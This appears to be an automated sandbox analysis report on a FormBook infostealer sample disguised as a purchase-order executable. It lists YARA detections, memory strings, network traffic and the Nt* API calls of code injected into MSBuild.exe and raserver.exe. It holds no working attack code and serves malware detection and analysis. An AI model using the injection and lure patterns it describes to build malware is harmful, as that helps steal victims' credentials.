          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259665211.0000000000F88000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Purchase Order 40,7045$.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417BA0 NtCreateFile,1_2_00417BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417C50 NtReadFile,1_2_00417C50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417CD0 NtClose,1_2_00417CD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417D80 NtAllocateVirtualMemory,1_2_00417D80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417C4C NtReadFile,1_2_00417C4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00417CCA NtClose,1_2_00417CCA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01529910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015299A0 NtCreateSection,LdrInitializeThunk,1_2_015299A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529840 NtDelayExecution,LdrInitializeThunk,1_2_01529840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01529860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015298F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_015298F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529A50 NtCreateFile,LdrInitializeThunk,1_2_01529A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01529A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529A20 NtResumeThread,LdrInitializeThunk,1_2_01529A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529540 NtReadFile,LdrInitializeThunk,1_2_01529540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015295D0 NtClose,LdrInitializeThunk,1_2_015295D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529710 NtQueryInformationToken,LdrInitializeThunk,1_2_01529710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529FE0 NtCreateMutant,LdrInitializeThunk,1_2_01529FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529780 NtMapViewOfSection,LdrInitializeThunk,1_2_01529780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015297A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_015297A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01529660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015296E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_015296E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529950 NtQueueApcThread,1_2_01529950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015299D0 NtCreateProcessEx,1_2_015299D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152B040 NtSuspendThread,1_2_0152B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529820 NtEnumerateKey,1_2_01529820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015298A0 NtWriteVirtualMemory,1_2_015298A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529B00 NtSetValueKey,1_2_01529B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152A3B0 NtGetContextThread,1_2_0152A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529A10 NtQuerySection,1_2_01529A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529A80 NtOpenDirectoryObject,1_2_01529A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529560 NtWriteFile,1_2_01529560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152AD30 NtSetContextThread,1_2_0152AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529520 NtWaitForSingleObject,1_2_01529520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015295F0 NtQueryInformationFile,1_2_015295F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529770 NtSetInformationFile,1_2_01529770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152A770 NtOpenThread,1_2_0152A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529760 NtOpenProcess,1_2_01529760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152A710 NtOpenProcessToken,1_2_0152A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529730 NtQueryVirtualMemory,1_2_01529730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529650 NtQueryValueKey,1_2_01529650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529670 NtQueryInformationProcess,1_2_01529670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01529610 NtEnumerateValueKey,1_2_01529610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015296D0 NtCreateKey,1_2_015296D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048195D0 NtClose,LdrInitializeThunk,6_2_048195D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819540 NtReadFile,LdrInitializeThunk,6_2_04819540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048196D0 NtCreateKey,LdrInitializeThunk,6_2_048196D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_048196E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819650 NtQueryValueKey,LdrInitializeThunk,6_2_04819650
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04819660
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819780 NtMapViewOfSection,LdrInitializeThunk,6_2_04819780
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819FE0 NtCreateMutant,LdrInitializeThunk,6_2_04819FE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819710 NtQueryInformationToken,LdrInitializeThunk,6_2_04819710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819840 NtDelayExecution,LdrInitializeThunk,6_2_04819840
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819860 NtQuerySystemInformation,LdrInitializeThunk,6_2_04819860
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048199A0 NtCreateSection,LdrInitializeThunk,6_2_048199A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04819910
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819A50 NtCreateFile,LdrInitializeThunk,6_2_04819A50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048195F0 NtQueryInformationFile,6_2_048195F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819520 NtWaitForSingleObject,6_2_04819520
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0481AD30 NtSetContextThread,6_2_0481AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819560 NtWriteFile,6_2_04819560
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819610 NtEnumerateValueKey,6_2_04819610
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819670 NtQueryInformationProcess,6_2_04819670
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048197A0 NtUnmapViewOfSection,6_2_048197A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0481A710 NtOpenProcessToken,6_2_0481A710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819730 NtQueryVirtualMemory,6_2_04819730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819760 NtOpenProcess,6_2_04819760
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0481A770 NtOpenThread,6_2_0481A770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819770 NtSetInformationFile,6_2_04819770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048198A0 NtWriteVirtualMemory,6_2_048198A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048198F0 NtReadVirtualMemory,6_2_048198F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819820 NtEnumerateKey,6_2_04819820
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0481B040 NtSuspendThread,6_2_0481B040
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048199D0 NtCreateProcessEx,6_2_048199D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819950 NtQueueApcThread,6_2_04819950
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819A80 NtOpenDirectoryObject,6_2_04819A80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819A00 NtProtectVirtualMemory,6_2_04819A00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819A10 NtQuerySection,6_2_04819A10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819A20 NtResumeThread,6_2_04819A20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0481A3B0 NtGetContextThread,6_2_0481A3B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_04819B00 NtSetValueKey,6_2_04819B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677BA0 NtCreateFile,6_2_00677BA0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677C50 NtReadFile,6_2_00677C50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677CD0 NtClose,6_2_00677CD0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677D80 NtAllocateVirtualMemory,6_2_00677D80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677C4C NtReadFile,6_2_00677C4C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00677CCA NtClose,6_2_00677CCA
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_0130EB700_2_0130EB70
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_0130EB600_2_0130EB60
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_0130CB5C0_2_0130CB5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041C16E1_2_0041C16E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00408A401_2_00408A40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00408A3B1_2_00408A3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041C52F1_2_0041C52F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00402D8A1_2_00402D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041BF031_2_0041BF03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EF9001_2_014EF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015041201_2_01504120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015099BF1_2_015099BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A10021_2_015A1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A8301_2_0150A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015BE8241_2_015BE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B28EC1_2_015B28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FB0901_2_014FB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015120A01_2_015120A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B20A81_2_015B20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150AB401_2_0150AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A3091_2_0150A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B2B281_2_015B2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A03DA1_2_015A03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015ADBD21_2_015ADBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151ABD81_2_0151ABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015923E31_2_015923E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151EBB01_2_0151EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0159FA2B1_2_0159FA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF1_2_015A4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B22AE1_2_015B22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B1D551_2_015B1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B2D071_2_015B2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E0D201_2_014E0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B25DD1_2_015B25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FD5E01_2_014FD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015125811_2_01512581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A2D821_2_015A2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B4771_2_0150B477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AD4661_2_015AD466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F841F1_2_014F841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A44961_2_015A4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015BDFCE1_2_015BDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B1FF11_2_015B1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AD6161_2_015AD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01506E301_2_01506E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B2EF71_2_015B2EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047E841F6_2_047E841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0489D4666_2_0489D466
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048025816_2_04802581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A25DD6_2_048A25DD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047D0D206_2_047D0D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A2D076_2_048A2D07
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047ED5E06_2_047ED5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A1D556_2_048A1D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047F6E306_2_047F6E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A2EF76_2_048A2EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0489D6166_2_0489D616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048ADFCE6_2_048ADFCE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A1FF16_2_048A1FF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048020A06_2_048020A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A20A86_2_048A20A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047FA8306_2_047FA830
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A28EC6_2_048A28EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048910026_2_04891002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048AE8246_2_048AE824
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047EB0906_2_047EB090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047F41206_2_047F4120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047DF9006_2_047DF900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047F99BF6_2_047F99BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A22AE6_2_048A22AE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0488FA2B6_2_0488FA2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0480EBB06_2_0480EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_047FAB406_2_047FAB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048903DA6_2_048903DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0489DBD26_2_0489DBD2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_048A2B286_2_048A2B28
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067C16E6_2_0067C16E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00668A406_2_00668A40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00668A3B6_2_00668A3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067C52F6_2_0067C52F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00662D8A6_2_00662D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00662D906_2_00662D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_0067BF036_2_0067BF03
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_00662FB06_2_00662FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 014EB150 appears 136 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 047DB150 appears 72 times
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259665211.0000000000F88000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000000.00000000.253166993.0000000000812000.00000002.00020000.sdmpBinary or memory string: OriginalFilename vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMARCUS.dll4 vs Purchase Order 40,7045$.exe
